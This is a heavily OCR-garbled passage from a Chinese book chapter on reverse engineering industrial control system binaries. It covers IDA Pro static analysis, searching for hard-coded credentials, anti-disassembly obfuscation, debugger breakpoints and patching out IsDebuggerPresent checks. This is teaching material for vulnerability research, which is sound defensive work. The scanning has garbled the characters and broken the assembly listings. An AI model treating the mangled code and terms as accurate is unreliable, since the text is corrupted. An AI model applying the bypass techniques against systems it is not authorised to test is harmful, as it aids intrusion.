mov [ebp+ms_exc. registration. TryLevel], 
mou eax, large fs:18h 

mou esi, [eaxt4] 

mov [ebptvar_24], ebx 

mou edi, offset Target 


loc_4167B8: ; Comperand 
ebx 
esi ; Exchange 
edi ; Destination 
ds: InterlockedCompareExchange 
eax, ebx 
short loc_416/7DE 


eax, esi 
short loc_4167D1 


esi ; dwMilliseconds| |loc_4167DE: 

[ebptvar_24], esi 3E8h xor esl, 

short loc_4167E1 ds:Sleep inc esi 
short loc_4167B8 


loc_4167E1: 

mov eax, dword_42D27C 
cmp eax, esi 

j short loc_4167F4 


图 7-4 IDA 中 的 代码 基本 块 


基本 块 由 忌 是 一 起 执行 的 一 系列 连续 指令 组 成 ， 通 常 以 某 种 类 型 的 跳 转 命令 结束 。 以 这 种 方式 来 查看 二 进 制 文件 ， 可 以 体验 到 原始 源 代码 的 逻辑 流程 。 


Cs) 


如 果 需 要 复习 下 汇编 语言 技巧 (或 需要 对 其 进行 学 习 ) ， 但 又 不 想 在 安全 分 析 中 不 太 可 能 用 到 的 功能 上 耗费 过 多 时 间 ， 那 么 可 以 阅读 Eldad Eilam 撰 写 的 
«Reversing: Secrets of Reverse Engineering» [3] — 书 的 第 2 章 。 实 际 上 应 该 通读 全 书 ， 因 为 该 书写 得 确实 不 错 ， 其 中 的 第 2 章 主要 对 基本 的 汇编 语言 指令 进行 了 介 


2n 


-Hno 


如 果 需 要 按照 用 户 的 个 人 风格 来 查看 C 代 码 ，IDA Pro 的 开 友 商 Hex-Rays 公 司 还 提供 了 一 款 名 为 Hex-Rays Decompiler 的 插件 (https://www.hex- 
rays.com/products/decompiler/index.shtml) 来 实现 这 一 工作 。 该 产品 实际 上 相当 惊艳 ， 可 以 帮助 用 户 节 省 大 量 时 间 。Decompiler 插 件 知道 编译 器 如 何 为 各 
种 处 理 器 生成 汇编 语言 ， 并 且 通 过 反 汇 编 揭 令 序列 还 能 够 识别 大 量 的 公共 库 函 数 ， 包 括 libc 库 函数 。 如 果 打 算 人 花费 大 量 的 时 间 来 分 析 可 执行 二 进 制 文件 ， 那 么 
Hex-Rays Decompiler 揪 件 值得 一 试 \。 


即使 二 进 制 文 件 中 的 遂 数 名 称 已 经 被 编译 器 清除 掉 了 ，1DA 还 是 能 够 列 出 二 进 制 中 所 有 被 调用 的 消 数 ， 如 图 7-5 所 示 ， 包 括 外 部 和 内 部 函数 。 在 列表 中 应 该 对 
通常 可 能 存在 漏洞 的 消 数 进行 认真 分 析 ， 如 strcpy、printf、gets 以 及 这 些 消 数 的 所 有 变 体 ， 在 搜索 那些 显而易见 的 漏洞 时 ， 前 期 工作 宜 从 查找 这 些 肖 数 开 始 。 


Function name i 


_ehhandler$?enable_segment@_Helper@_Concut 
f) _ehhandler$?enable_segment@_Helper@_Concut 
_ehhandler$?enable_segment@_Helper@_Concur 
_except_handler4 

[f] _onexit 

__security_check_cookie(x) 

_setdefaultprecision 
_unwindfunclet$?_Fac_tidy@@YAXXZ$0 
_unwindfunclet$?_Fac_tidy@@YAXXZ$0_0 

F] _unwindfunclet$?_Fac_tidy@@YAXXZ$0_1 
__unwindfunclet$?_Fac_tidy@@YAXXZ$0_2 


__unwindfunclet$?_Fac_tidy@@YAXXZ$0_3 
_unwindfunclet$?_Fac_tidy@@YAXXZ$0_4 
_unwindfunclet$?_Fac_tidy@@YAXXZ$0_5 
__unwindfunclet$?_Fac_tidy@@YAXXZ$0_6 
_unwindfunclet$?_Fac_tidy@@YAXXZ$0_7 
_amsg_exit 

_atexit 

_controlfp_s 

_crt_debugger_hook 
_except_handler4_common 

_initterm 

_initterm_e 

_invoke_watson 

_lock 

fF| _pre_c init 

_pre_cpp_init 

一 


«som l 一 ai. 


图 7-5 IDA Fa 


仅仅 知道 存在 对 漏洞 函数 的 调用 是 不 够 的 ， 还 需要 知道 哪个 消 数 调用 了 漏洞 函数 。 最 后 ， 我 们 还 需要 知道 从 漏洞 消 数 回溯 到 接口 的 整个 执行 流程 是 怎样 的 。 
对 此 ， 我们 使 用 了 1DA 中 的 调用 图 (Call Graph) 特性 ， 如 图 7-6 所 示 。 


调用 图 不 仪 显示 了 所 选 函 数 调用 了 哪些 函数 ， 而 且 还 显示 了 哪些 冰 数 调用 了 所 选 男 数 。 调 用 图 基于 前 面 的 步骤 继续 扩展 。 所 有 这 些 工作 都 是 自动 完成 的 ， 否 
则 如 果 手 工 完 成 的 话 工 作 量 太 大 。 一 旦 定位 了 接口 函数 ， 束 可 以 治 执行 路 径 一 直 回 溯 到 可 能 人 存在 漏洞 的 函数 ， 并 确定 是 否 对 输入 数据 进行 了 安全 过 滤 。 根 据 对 代 
码 的 过 滤 规 则 和 检查 内 容 ， 融 可 能 会 挖掘 到 漏洞 。 


也 许 所 有 这 些 非 常 出 色 的 功能 仍然 不 能 够 打动 你 。 也 许 你 一 直 倾 心 于 自动 化 过 程 (说 实话 ， 这 也 正 是 工控 系统 存在 的 意义 ， 不 是 吗 ? ) ， 不 想 费 心 对 上 述 内 
容 进行 手动 分 析 。 好 吧 ， 那 你 很 走运 ，IDAPython 正 是 为 这 种 情况 而 开发 的 。1DAPython 是 一 个 插件 ， 通 过 该 插件 可 以 在 IDA 程 序 中 运行 Python 代码 ， 从 而 能 够 
实现 对 微小 细节 的 控制 。 如 果 不 想 费心 去 列 出 漏洞 函数 的 调用 图 ， 并 跟踪 漏洞 消 数 回溯 到 接口 。 那 么 可 以 编写 一 个 自动 实现 该 任务 的 Python 脚 本 ， 并 输出 控制 流 
跟踪 信息 ， 甚 至 可 以 借助 该 特性 来 编写 自己 的 模糊 测试 监控 代理 程序 。 借 助 IDAPython 插 件 几 乎 可 以 获取 所 有 的 分 析 能 力 ， 任 何 可 以 手工 完成 的 分 析 过 程 都 可 以 
使 用 脚本 自动 执行 。 当 然 了 ， 用 户 需要 了 解 Python 语 言 并 对 IDA API 非 常熟 悉 ， 但 是 为 此 所 花费 的 时 间 还 是 非常 值得 的 。 


w 注意 
如 果 有 兴趣 了 解 IDAPython ， 那 么 读者 可 以 看 看 Justin Seitz 撰 写 的 《Grey Hat Python》 一 书 ， 书 中 通过 几 个 例子 帮助 读者 开启 了 二 进 制 自动 化 分 析 的 大 门 。 


IDA 是 一 款 伟大 的 通用 分 析 工 具 ，1DAPython 则 能 够 提供 高 度 的 自动 化 水 平 ， 但 如 果 没 有 时 间 来 编写 对 目标 进行 全 面 分析 的 脚本 ， 又 或 者 找 不 到 相关 脚本 ， 
这 时 该 怎么 办 呢 ? 别 担心 。 全 自动 化 的 静态 二 进 制 分 析 工 具 能 够 承担 大 部 分 的 工作 。 这 些 全 自动 化 的 静态 二 进 制 分 析 工 具 可 能 不 会 注意 到 手工 分 析 过 程 中 遇 到 的 
细节 ， 但 是 它们 可 以 在 短 时 间 内 完成 大 量 工作 。 事 实 上 ， 从 这 些 工具 上 手 是 一 个 好 主意 。 利 用 全 上 自动 化 的 静态 二 进 制 分 析 工 具 可 以 挖 扬 出 一 些 常 见 的 漏洞 ， 从 而 
为 漏洞 研究 人 员 及 研究 团队 的 同伴 们 腾 出 更 多 的 时 间 去 探索 更 加 有 趣 的 东西 。 
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7,62% (-73,191) 47 nodes, 62 edge segments, 12 crossings 


图 7-6 IDA 调 用 图 


尽管 1DA 是 反 汇 编 和 调试 工具 中 当仁不让 的 市 场 领 导 者 ， 但 是 对 于 全 自动 化 的 静态 二 进 制 分 析 工 具 没有 类 似 明确 的 选择 。 自 动 化 静态 二 进 制 分 析 工 具 (以 下 顺 
序 不 代表 推荐 或 偏好 顺序 ) 包括 Veracode 公 司 开发 的 SAST (https://www.veracode.com/products/binary-static-analysis-sast) 、Codenomicon 公 司 开发 的 
AppCheck (http://www.codenomicon.com/products/appcheck/) 和 BitBlaze (http://bitblaze.cs.berkeley.edu/) 。 当 采购 自动 化 静态 二 进 制 分 析 工 具 
时 ， 需 要 对 其 功能 进行 比较 ， 确 保 分 析 工 具 能 够 读 取 目 标 二 进 制 文件 ， 并 且 能 够 帮助 挖掘 出 用 户 所 希望 找到 的 类 型 的 漏洞 。 


2. 我 们 在 找寻 什么 


现在 我 们 有 许多 功能 丰富 的 工具 可 以 有 助 于 二 进 制 文件 的 分 析 。 我 们 长 至 能 够 将 分 析 过 程 目 动 化 。 这 一 切 看 上 去 都 挺 好 的 ， 但 这 些 工具 只 有 在 用 户 清楚 地 知 
道 自 己 要 寻找 什么 的 时 候 才 能 够 有 所 帮助 。 


虽然 掌握 高 级 语言 ( 即 “C 语 言 或 更 高 级 的 语言 ”) 的 编程 技巧 在 进行 静态 二 进 制 分 析 时 并 非 绝对 必要 ， 但 确实 能 够 有 所 帮助 。 如 果 对 高 级 语言 中 带 见 的 编程 
结构 如 何 转换 为 汇编 语言 有 一 定 了 解 ， 那 就 更 好 了 。 这 样 ， 当 分 析 人 员 看 到 几 条 mov 指 令 后 面 跟着 一 条 cmp 指 令 和 一 条 jnz 指 令 时 ， 就 会 意识 到 这 很 可 能 是 一 条 if 
语句 。 而 一 旦 分 析 涉 及 程序 的 高 级 结构 设计 信息 (如 果 安 沪 了 Hex-Rays Decompiler 插 件 ， 融 会 容易 一 些 ) ， 融 可 以 结合 安全 编码 方式 进行 研究 。 


关于 安全 编码 实践 的 最 好 的 介绍 书籍 之 一 是 Robert Seacord 编 写 的 《Secure Coding in C and C++》[ (http://www.cert.org/secure- 
coding/publications/books/secure-coding-c-c-second-edition.cfm) 。Seacord 针 对 安全 编程 漏洞 提出 了 一 种 实用 的 分 类 方式 ， 并 通过 大 量 的 示例 来 对 每 种 
漏洞 的 基本 原理 进行 了 襄 明 。 书 中 涵盖 的 内 容 包 括 了 从 整 型 上 洪 与 下 溢 、 到 堆 溢 出 、 再 到 格式 化 字符 串 漏 洞 等 诸多 类 型 ， 还 讨论 了 许多 漏洞 利用 方法 的 基本 原 
理 ， 既 包括 堆栈 中 执行 任意 代码 的 基础 知识 ， 也 包括 更 复杂 的 漏洞 利用 策略 ， 比 如 ROP 扩 术 (用 于 绕 过 不 可 执行 堆栈 ) 。 将 这 些 知 识 与 源 代码 如 何 转 换 为 汇编 语 


言 的 知识 相 结合 ， 应 该 就 足以 发 现 目标 二 进 制 文件 中 的 安全 漏洞 。 


更 具体 地 说 ， 工 控 系 统 软件 和 设备 似乎 通常 都 会 包括 硬 编码 的 认证 信息 和 “后 | 门 ”。 这 并 非 出 于 什么 恶意 (所 有 人 都 会 这 么 说 ) 。 现 场 技术 人 员 通 党 使 用 这 
些 东 西 来 快速 、 轻 松 地 为 设备 提供 服务 ， 而 不 必 打 电话 给 主管 去 查找 最 新 的 用 户 名 和 口令 ， 更 何况 给 主管 打 电 话 也 未 必 管 用 ， 因 为 一 方面 旧 口 令 太 难 记 了 ， 而 另 
一 方面 上 夜班 的 兄弟 又 会 更 改口 令 .….. 你 慌 的 。 当 SCADA 系 统 同 互联 网 完全 物理 隔离 时 ， 这 样 的 设计 思路 还 是 有 一 定 意义 的 。 业 务 流程 以 及 采用 更 敏捷 的 方式 基 
于 实时 数据 做 出 决策 的 要 求 决定 了 系统 需要 连接 到 互联 了 网， 哪怕 只 是 连接 到 业务 网 络 。 这 束 意 味 着 针对 工控 系统 的 潜在 攻击 源 大 幅 增 加 ， 因 此 存储 在 硬 编码 字段 
中 、 使 用 方便 的 认证 信息 对 于 攻击 者 而 言 唾 手 可 得 。 作 为 一 名 安全 研究 人 员 ， 肯 定 也 会 查找 这 些 信息 ， 找 到 处 理 登录 过 程 的 代码 ， 并 进行 深入 挖掘 。 程 序 员 们 或 
许 已 经 尝试 利用 了 一 些 联 明 的 方法 ， 例 如 将 认证 信息 分 割 为 若干 段 ， 然 后 在 代码 中 再 重新 组 装 ， 这 样 束 不 会 从 二 进 制 文件 的 十 六 进 制 转 储 形式 中 轻易 地 读 取 到 口 
令 ， 不 过 程序 员 们 也 可 能 没 这 么 做 (实际 上 他 们 很 可 能 不 这 样 做 ) 。 虽 然 寻 找 硬 编码 的 认证 信息 从 学 术 角 度 上 来 看 并 不 那么 富有 吸引 力 ， 但 是 如 果 发 现 它 们 将 会 
产生 巨大 的 影响 。 


3. 潜 在 障碍 


看 到 这 里 ， 读 者 可 能 会 想 ，“ 所 有 这 些 工具 似乎 都 使 逆向 他 人 的 代码 变 得 很 容易 ， 但 是 我 们 可 以 做 什么 来 阻止 对 代码 的 逆向 分 析 吗 ”” 很 高 兴 你 会 这 么 问 。 
事实 上 ， 软 件 开 友 人 员 可 以 做 许多 事情 ， 促 使 对 于 二 进 制 文件 的 静态 (和 动态 ) 分 析 更 加 困难 。 


由 于 二 进 制 分 析 的 第 一 步 就 是 对 二 进 制 文 件 进行 反 汇编 ， 如 果 以 某 种 方式 对 二 进 制 文 件 进行 修改 则 能 够 混淆 反 汇 编 器 ， 这 时 研究 人 员 (和 攻击 者 ) 在 分 析 二 
进 制 文 件 时 就 不 会 那么 走运 了 。 实 现 这 一 目的 的 方法 之 一 就 是 代码 加 密 。 


代码 加 密 (code encryption) 是 在 二 进 制 文件 编译 之 后 ， 发 送 给 客户 之 前 进行 的 。 经 过 加 密 的 二 进 制 文件 内 容 全 部 显示 为 乱码 ， 从 而 使 得 标准 的 静态 分 析 方 
法 无 法 应 用 ， 同 时 加 密 算法 还 会 在 二 进 制 代码 中 插入 一 小 段 未 加 密 的 stub 代 码 ， 其 作用 是 对 程序 的 其 余部 分 进行 解密 操作 。 然 而 ， 如 果 加 密 机 制 是 已 知 的 ， 则 可 
能 存在 破解 加 密 算 法 进而 恢复 原始 二 进 制 代码 的 方法 。 根 据 算法 的 复杂 度 以 及 加 密 密 钥 的 复杂 度 ， 研 究 团 队 或 许 能 够 做 到 这 一 点 。 而 更 可 能 的 是 ， 没 有 破解 的 必 
要 。 因 为 几乎 可 以 肯定 存在 一 个 网 站 (往往 还 伴随 着 不 太 安全 的 广告 )， 该 网 站 中 能 够 提供 对 二 进 制 文件 解密 的 程序 (有 时 也 称 为 脱 壳 器 ) 。 


平 运 的 是 ， 并 不 是 所 有 的 代码 加 密 算法 都 很 复杂 。 事 实 上 ， 复 杂 度 更 局 的 加 密 算法 会 延长 程序 的 启动 时 间 ， 因 此 加 密 算法 更 趋 于 简单 。 大 多 数 时 候 称 这 些 算 
法 为 “加 密 算法 ”有 点 言 过 其 实 ， 将 其 称 之 为 “编码 算法 ”可 能 更 接近 于 实际 情况 。 其 中 一 个 例子 就 是 利用 赔 入 在 二 进 制 文 件 中 的 某 个 位 置 的 值 对 代码 进行 简单 
的 异 或 (XOR) 操作 。 


ws 


XOR 是 “ 异 或 ”的 缩写 。 异 或 操作 是 位 操作 ， 如 果 进 行 比较 的 比特 位 是 不 同 的 〈 例 如 一 个 为 1， 一 个 为 0) ， 则 异 或 操作 返回 1; 如 果 进 行 比较 的 比特 位 是 相同 
的 ， 则 返回 0。 如 果 两 次 异 或 操作 均 应 用 相同 的 操作 数 ， 那 么 两 次 异 或 操作 则 具有 良好 的 自 反 性 。 例 如 ， 给 定 比 特 模式 串 0010 〈 其 十 进 制 表示 为 2) ， 第 二 个 和 第 
四 个 比特 位 可 以 通过 与 第 二 个 和 第 四 个 比特 位 为 1 的 比特 模式 串 的 按 位 异 或 来 进行 转换 : 


0010 (decimal 2) XOR 1010 (decimal 10) = 1000 (decimal 8) 


类 似 上 面 的 算法 使 得 解密 代码 stub 非 党 精简 ， 执 行 速 度 也 非常 快 。 这 也 是 安全 性 与 可 用 性 相互 权衡 的 一 个 典型 实例 。 


另 一 种 阻碍 静态 分 析 的 策略 是 在 二 进 制 文件 中 的 某 些 位 置 戏 入 汇编 指令 ， 从 而 混淆 反 汇 编 过 程 ， 导 致 对 余下 代码 得 到 错误 的 解析 结果 。 方 法 是 在 代码 中 的 某 
个 位 置 放置 一 条 不 可 达 的 错误 指令 。 示 例如 下 : 


# ..some other code first 

jmp ToRealCode 

<Invalid instruction here..maybe the first 3 bytes of a 4 byte instruction> 
ToRealCode: 

#...program continues from here 


当 反 汇编 执行 到 错误 指令 中 的 字 节 时 ， 反 汇编 算法 会 将 下 一 条 指令 的 部 分 字 节 解析 为 错误 指令 的 一 部 分 ， 从 而 影响 对 二 进 制 文件 中 剩余 代码 的 解析 。 


看 到 这 里 ， 经 验 丰 富 的 逆向 工程 师 可 能 会 谤 ，“ 这 种 方法 只 会 对 采用 线性 扫 摘 反 汇 编 算法 的 反 汇 编 器 的 解析 结果 产生 影响 ， 而 对 IDA Pro 来 说 可 能 融 未 必 奏 效 
了 ! ”确实 是 这 样 。 不 是 所 有 的 反 汇 编 器 的 工作 机 理 都 相同 。 米 用 线性 扫描 反 汇编 算法 的 反 汇 编 器 从 二 进 制 文件 的 起 始 位 置 开始 对 指令 进行 解析 (计算 其 长 
E) ， 然 后 向 前 移动 一 定 的 字 节 数 ， 再 对 当前 地 址 的 代码 进行 同样 的 操作 直至 到 达 二 进 制 文 件 未 尾 。 


另 一 种 对 二 进 制 文件 进行 反 汇 编 的 算法 即行 进 递 归 反 汇编 算法 。 行 进 递 归 反 汇编 算法 (recursive traversal) 与 线性 扫 摘 反 汇编 算法 类 似 ， 也 是 从 二 进 制 文件 
的 起 始 位 置 开始 反 汇编 ， 但 当 解 析 到 跳 转 指令 时 ,行进 递归 反 汇 编 算法 会 从 跳 转 指令 的 目的 地 址 处 开始 继续 解析 ， 而 非 继 续 进行 线性 解析 。 如 果 跳 转 是 有 条 件 
的 ， 那 么 反 汇 编 器 最 终 还 会 返回 到 代码 的 另 一 个 分 支 ， 并 从 该 分 支 处 继续 解析 。1IDA 和 OllyDbg 采 用 的 都 是 这 种 反 汇 编 算法 。 因 此 ， 所 有 采用 行进 递归 反 汇 编 算法 
的 反 汇 编 器 并 不 会 被 前 面 提 到 的 混淆 方法 所 欺骗。 


这 是 否 意味 着 如 果 使 用 了 基于 行进 递归 反 汇 编 算 法 的 反 汇 编 器 ， 融 不 必 再 担心 反 汇 编 混 淆 技术 了 吗 ” 遗 憾 的 是 ， 答 案 是 “不 ”。 对 混淆 技术 进行 些微 的 改动 
仍然 能 够 混淆 基于 行进 递归 反 汇 编 算法 的 反 汇 编 器 的 分 析 结 果 。 不 仅 可 以 借助 无 条 件 跳 转 指 令 跳 过 错误 指令 ， 还 可 以 借助 不 透明 谓词 (opaque predicate) 用 条 
件 跳 转 的 方式 跳 过 错误 指令 。 不 透明 谓词 本 质 上 是 一 条 条 件 判断 语句 ， 程 序 员 在 编译 时 就 知道 不 透明 谓词 的 真 值 ， 但 看 起 来 不 透明 谓词 的 真 值 只 有 在 运行 时 才能 
得 到 。C 语 言 编写 的 示例 如 下 : 


mt a= 1, b= 2 
1 (a == b) { 
// Unreachable code 


// Real code 


将 错误 指令 放 在 不 可 达 的 代码 段 中 ， 昌 然 代 码 行为 不 会 受到 影响 ， 但 是 会 混淆 反 汇 编 过 程 。 事 实证 明 ， 这 种 方法 无 论 是 针对 采用 绪 性 扫 摘 反 汇编 算法 的 反 汇 
编 器 还 是 采用 行进 递归 反 汇 编 算 法 的 反 汇 编 器 都 会 奏效 。 


这 些 方法 都 可 以 (并 且 已 经 ) 在 编译 器 中 予以 实现 。 最 初 编写 代码 的 程序 员 甚至 不 需要 知道 上 述 混淆 方法 已 经 得 到 了 应 用 。 那 么 ， 安 全 研究 人 员 融 无 计 可 施 
了 吗 ” 庆 笠 的 是 ， 还 有 一 张 牌 可 以 打 ， 虽 然 这 张 牌 对 技术 的 要 求 比较 高 。 针 对 这 些 方法 的 应 对 方式 融 是 用 无 操作 指令 (no-op instructions) 来 蔡 损 错 误 指 令 。 


给 二 进 制 文件 打 补 丁 就 是 指 用 某 些 字 节 来 替换 另 一 些 字 节 。 替 换 过 程 中 必须 注意 保持 所 有 对 内 存 地 址 的 引用 都 是 有 效 的 ， 因 为 其 中 有 些 对 内 存 地 址 的 引用 是 
相对 于 文件 执行 过 程 中 当前 地 址 的 。 因 此 ， 使 用 相同 数量 的 字 节 进行 字 节 替换 是 首选 。 如 果 需 要 更 多 的 空间 ， 则 需要 将 新 字 节 添加 到 文件 末尾 ， 然 后 跳 转 到 该 地 
址 处 执行 ， 执 行 完 后 再 返回 ， 从 而 不 影响 程序 的 执行 流程 。 


用 无 操作 指令 蔡 换 错误 指令 ， 说 起 来 容易 但 做 起 来 难 。 因 为 二 进 制 文件 中 可 能 包含 数 百 万 条 指令 。 那 么 ， 哪 些 指令 才 是 错误 指令 呢 ? 好 吧 ， 必 须 手 工 跟 路 。 
经 验 丰 富 的 逆向 工程 师 通 常 只 需要 看 到 汇编 指令 块 ， 束 能 够 对 该 指令 块 是 属于 程序 还 是 只 是 随机 指令 序列 得 到 一 个 初步 印象 ， 因 为 对 错误 指令 之 后 的 指令 进行 肥 
汇编 得 到 的 结果 看 起 来 束 像 是 随机 指令 序列 一 样 。 但 愿 错 误 指 令 在 执行 流 的 起 始 位 置 附 近 ， 那 么 就 可 以 早早 地 发 现 这 些 错 误 指令 了 ， 然 而 这 难以 保证 。 但 是 ， 
吕 ,这 也 就 是 为 什么 优秀 的 送 向 工程 师 能 够 获得 较为 可 观 的 薪酬 的 原因 (高 薪 是 留 给 为 中 等 收入 的 工程 师 签 友 支票 的 那些 人 的 ) 。 俗 话说 得 好 ， 钱 多 事 少 离 家 
近 ， 哪 能 轮 到 你 手 里 ? 


还 有 其 他 方法 使 得 分 析 过 程 困 难 重重 ， 但 这 些 方法 主要 针对 的 是 动态 分 析 。 且 听 我 慢 慢 道 来 …… 


7.5.3 ”动态 二 进 制 分 析 
到 目前 为 止 ， 我 们 还 只 是 观察 二 进 制 文件 ， 而 没有 实际 运行 它 。 试 想 一 下 ， 如 果 没 有 适当 的 环境 来 运行 二 进 制 文件 ， 又 或 者 不 信任 当前 的 执行 环境 ， 因 此 这 
些 时 候 并 不 想 实 际 运行 这 些 二 进 制 文件 。 如 果 分 析 对 象 是 恶意 代码 ， 那 么 正 是 这 种 情况 ， 但 在 这 里 并 不 是 我 们 的 关注 点 所 在 。 我 们 正在 寻找 的 是 能 够 运行 工控 系 
统 设备 或 者 对 工控 系统 设备 进行 配置 的 代码 ， 所 以 可 以 放心 地 假设 ( 约 99.99% 的 把 握 ， 因 为 永远 不 能 真正 确定 ) 所 分 析 的 文件 中 不 包含 恶意 内 容 。 


到 目前 为 止 ， 我 们 使 用 了 反 汇 编 器 。 现 在 ,我 们 还 需要 一 个 调试 器 ， 而 调试 器 通常 内 置 反 汇编 器 。 调 试 器 (debugger) 也 是 一 个 应 用 程序 ， 该 程序 允许 用 户 
执行 步 进 调试 、 逐 条 地 执行 指令 以 及 分 析 (有 时 需要 进行 修改 ) AGAR. IDA Pro 具 有 出 色 的 调试 功能 ， 特 别 是 当 与 IDAPython 结 合 使 用 时 。 在 分 析 正 在 运行 
的 程序 之 前 ， 首 先 要 对 可 以 使 用 的 工具 有 所 了 解 。 


1. 常 见 调 试 器 特性 


已 经 获取 了 运行 中 程序 控制 权 的 调试 器 为 了 查看 程序 状态 ， 需 要 暂停 程序 。 这 是 通过 断 点 (breakpoint) 来 实现 的 。 当 程序 运行 过 程 中 命中 断 点 时 ， 则 不 会 
继续 执行 下 一 条 指令 。 调 试 器 如 何 做 到 这 一 点 呢 ? 调试 器 使 用 断 点 指令 替换 原始 指令 。 不 同 的 处 理 器 处 理 方式 也 各 不 相同 。x86 系 列 处 理 器 使 用 int3 指 令 ， 其 十 六 
进 制 表 示 为 0xXCC。 由 于 只 有 一 个 字 节 ， 所 以 使 用 该 指令 给 程序 打 补 丁 的 效果 非常 好 ， 因 为 其 至 多 影响 一 条 指令 。 当 处 理 器 执行 到 int3 指 令 时 ， 束 会 友 送 SIGTRAP 
言 号 ， 调 试 器 则 会 调用 该 信号 的 处 理 程 序 。 当 该 处 理 程序 运行 时 ， 调 试 器 束 获 取 了 程序 的 控制 权 即 能 够 对 程序 进行 分 析 。 分 析 完 成 之 后 ， 束 可 以 告诉 调试 器 继续 
执行 。 此 时 ， 调 试 器 会 将 原始 指令 放 回 原来 的 位 置 ， 然 后 跳 转 到 那个 位 置 ， 从 而 让 被 调试 程序 重新 从 断 点 处 继续 执行 。 


借助 调试 器 的 上 述 基 本 特性 ， 调 试 器 能 够 提供 多 种 步 进 调试 方法 。 只 要 愿意 ， 就 能 够 在 断 点 处 中 断 执行 ， 还 可 以 对 程序 进行 单 步调 试 ， 即 每 次 执行 一 条 指令 
并 在 每 条 指令 执行 后 中 断 执 行 。 为 此 ， 调 试 器 设置 陷阱 标志 (trap flag) ” (在 “潜在 障碍 ”一 节 中 会 有 更 多 的 介绍 ) ， 这 使 得 程序 执行 起 来 就 好 像 在 每 个 位 置 都 


设置 了 一 个 断 点 。 大 多 数 调试 器 也 允许 步 入 (step into) Bey, MMI SAAS TREN, REĠA TAER, taller (step over) 
浮 数 。 此 外 ， 如 果 在 消 数 内 部 并 希望 从 被 调用 消 数 之 后 的 位 置 继 续 执行 ， 则 可 以 选择 步 出 (step out) 函数 。 相 比 于 找到 函数 结束 位 置 、 再 设置 断 点 、 继 续 执行 
到 断 点 、 删 除 断 点 、 然 后 单 步 步 出 等 一 系列 操作 ， 这 种 方式 显然 简单 得 多 。 调 试 二 进 制 文件 时 ， 熟 悉 所 有 调试 特性 对 于 快速 遍历 目标 程序 是 非常 必要 的 。 


现在 知道 了 如 何在 各 个 位 置 中 断 程序 的 执行 。 而 一 旦 中 断 程序 执行 又 该 做 些 什么 呢 ? 根据 中 断 程序 执行 的 位 置 ， 在 不 同 的 内 存 地 址 与 (或 ) CPU 寄存 器 中 可 
能 会 包含 很 重要 的 信息 。 此 时 分 析 人 员 拥 有 对 程序 内 部 数据 的 所 有 访问 权限 ， 如 果 能 够 在 合适 的 时 间 点 捕获 断 点 ， 束 能 够 查看 所 有 想 了 解 的 信息 。 也 许 分 析 人 员 
正在 查找 一 个 通常 以 加 密 形式 存储 的 口令 ， 但 是 当 程 序 检查 登录 时 的 认证 信息 时 ,口令 在 一 段 时 间 内 会 以 未 加 密 的 形式 存储 。 而 如 果 此 时 在 代码 中 检查 登录 认证 
言 息 的 位 置 放置 一 个 断 点 ， 那 么 融 可 能 在 内 存 中 看 到 密码 的 明文 形式 。 读 者 或 许 认为 这 个 例子 在 现实 中 不 太 可 能 出 现 ， 没 错 ， 但 很 可 能 并 非 出 于 你 所 设想 的 原 
因 。 遗 憾 的 是 ， 根 据 我 的 经 验 ， 工 控 系 统 软件 中 硬 编码 的 口令 根本 未 经 加 密 。 是 的 ， 人 存在 硬 编码 的 口令 已 经 够 糟糕 了 ， 同 时 还 以 明文 形式 存储 的 情况 也 远 比 想 象 
中 的 更 为 常见 。 


程序 在 执行 过 程 中 通常 会 被 分 配 大 量 内 存 。 找 到 存储 感 兴趣 的 数据 的 特定 内 存 要 求 程序 员 具 备 一 定 的 汇编 功力 。 再 次 ， 了 解 内 存 数据 存储 内 容 的 合 义 也 要 求 
程序 员 具 备 高 超 的 逆向 分 析 技 巧 ， 并 且 需 要 掌握 编译 器 将 源 代码 转换 为 汇编 代码 的 方式 。 


有 了 时 只 需 关 注 内 存 位 置 ， 而 无 需 关注 对 该 内 存 位 置 进行 修改 或 者 从 该 位 置 读 取 数据 的 指令 。 那 么 调试 器 还 有 另 一 个 功能 ， 即 能 够 在 使 用 某 个 特定 内 存 位 置 时 
中 断 程序 的 执行 。 这 一 功能 非常 强大 ， 但 调试 器 实现 中 断 的 方式 也 确实 会 拖 慢 程序 的 运行 速度 。 当 程序 加 载 配置 信息 时 ， 该 功能 很 有 用 。 因 为 如 果 已 经 知道 配置 
言 息 被 加 载 到 何 处 ， 但 是 希望 进一步 确定 其 应 用 时 间 时 (因为 在 配置 应 用 之 前 攻击 者 可 以 借助 一 个 漏洞 实现 对 原配 置信 息 的 覆盖 ! ) ， 融 可 以 设置 内 存 断 点 ， 然 
后 从 使 用 点 往 加 载 点 进行 回溯 。 “静态 二 进 制 分 析 工 具 ” 一 节 中 提 到 的 调用 图 就 能 够 有 效 地 指导 上 述 工作 的 开展 。 


这 些 功 能 与 反 汇 编 器 的 功能 相 结合 ， 挖 掘 任何 漏洞 都 应 该 是 绰绰有余 了 。 
2. 潜 在 障碍 


正如 静态 分 析 一 样 ， 程 序 员 通 过 一 些 操作 也 会 提高 动态 分 析 的 难度 。 例 如 ， 如 果 目 标 程序 检测 到 有 调试 器 附加 到 该 程序 ， 那 么 目标 程序 融会 退出 或 者 执行 另 
一 条 路 径 中 的 代码 。 


检测 程序 是 否 附 加 了 调试 器 的 最 简单 但 同时 也 是 最 容易 规避 的 方法 是 使 用 Windows API 调 用 lsDebuggerPresent。 显 然 ， 只 有 当 程序 在 Windows 环 境 中 运行 
时 ,， 才 考虑 使 用 该 浮 数 。 消 数 lsDebuggerPresent 通 过 查看 进程 环境 块 (PEB) 来 确定 是 否 附加 了 调试 器 。 当 阔 数 返回 “true” 时 ， 程 序 可 以 选择 以 其 他 方式 执 
行 ， 否 则 就 继续 执行 。 规 避 上 述 检测 方法 其 实 并 不 困难 ,特别 是 在 拥有 一 个 功能 强大 的 调试 器 能 够 枚 举 出 所 有 晃 数 调用 的 情况 下 ， 例 如 IDA。 这 时 可 以 在 冰 数 列表 
中 搜索 lIsDebuggerPresent 函 数 ， 并 定位 其 调用 位 置 ， 然 后 对 程序 打 补 丁 让 其 执行 其 他 操作 。 给 程序 打 补 丁 即使 用 其 他 字 节 来 覆盖 现 有 字 节 ， 以 算 改 将 要 执行 的 
CPU 指令 。 还 可 以 采用 mov eax，0 和 一 定数 量 的 nop 命 令 蔡 换 IsDebuggerPresent 函 数 调用 的 方式 来 打 补 丁 ， 这 种 方式 能 够 保证 文件 尺寸 前 后 匹配 ， 也 可 以 更 改 
